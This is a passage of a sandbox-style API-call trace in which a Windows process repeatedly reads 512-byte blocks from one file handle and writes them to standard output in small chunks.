lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.639] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.639] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] GetFileType (hFile=0x50) returned 0x1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.639] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 
0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.640] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.640] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) 
returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] GetFileType (hFile=0x50) returned 0x1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.640] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.641] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.641] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.641] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] GetFileType (hFile=0x50) returned 0x1 [0146.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.642] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.643] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.643] ReadFile 
(in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] GetFileType (hFile=0x50) returned 0x1 [0146.643] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0146.643] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.644] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.644] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, 
lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] GetFileType (hFile=0x50) returned 0x1 [0146.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.644] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, 
lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.645] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.645] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.646] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.647] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0146.647] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] 
